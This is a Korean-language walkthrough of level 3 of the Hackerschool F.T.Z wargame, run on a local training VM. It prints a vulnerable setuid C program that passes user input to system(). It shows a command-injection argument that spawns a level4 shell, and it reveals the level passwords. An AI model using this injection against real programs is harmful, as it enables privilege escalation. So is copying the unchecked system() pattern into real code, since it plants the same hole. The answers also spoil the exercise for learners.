F.T.Z Level3 문제풀이

F.T.Z Level3 문제풀이

먼저 리눅스를 접해보지 않으신분들에겐 다소 명령어가 생소하실겁니다.

실습환경 : VMware Red Hat 9.0 (해커스쿨 F.T.Z 로컬 VM이미지)

한글 Putty 0.60 

다운로드 : http://gmyankee.tistory.com/42

login as : level3

password : can you fly?

[level3@ftz level3]$ ls

hint    public_html    tmp

ls 명령을 이용해서 디렉터리 목록을 확인합니다.

여느때와 마찬가지로 역시나 hint 명령이 있습니다.

cat 명령을 이용해서 hint 명령을 읽어봅시다.

#include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char **argv){ char cmd[100]; if( argc!=2){ printf( "Auto Digger Version 0.9\n" ); printf( "Usage : %s host \n", argv[0] ); exit(0); } strcpy( cmd, "dig @" ); strcat( cmd, argv[1] ); strcat( cmd, " version.bind chaos txt"); system( cmd ); }

if( argc!=2)

argc가 2가아닐때  Auto Digger Version 0.9를 출력하고

  Usage : 어쩌고 host를 출력합니다.

저는 위에 host만 보고 more hint를 보고 해봤는데 됬네요..

1. 동시에 여러문자열을 사용하려면?

2. 문자열 형태로 명령어를 전달하려면?

여러 문자열을 사용하는것은 "" 또는 '' 을 이용하실수 있습니다.

문자열형태로 명령어를 전달하는 방법은 ;(세미콜론)으로 여러명령어를 사용하실수 있습니다.

|(파이프)는 왼쪽에서 실행한 명령을 오른쪽에 대입하는 것이니 세미콜론과는 다른개념입니다.

[level3@ftz level3]$ find / -name autodig 2>/dev/null

find 명령으로 autodig라는 이름을 가진 파일을 찾습니다.

/bin/autodig를 실행해봅시다.

[level3@ftz level3]$ /bin/autodig

Auto Digger Version 0.9

Usage : /bin/autodig host

host라면 다될것 같아서 하나씩 해보았습니다.

level4의 권한을 가진 파일이어서 각 유저들의 host로 해보아도 level4의 권한만 주어집니다.

[level3@ftz level3]$ /bin/autodig "level4;/bin/bash;"

level5~20으로 해도 level4의 bash 셸로 상승합니다.

level4의 권한으로 상승된 것을 확인하실 수 있습니다.

[level3@ftz level3]$ my-pass

my-pass 명령어를 이용하여 level4의 패스워드를 확인해봅시다.

Level4 Password is "suck my brain".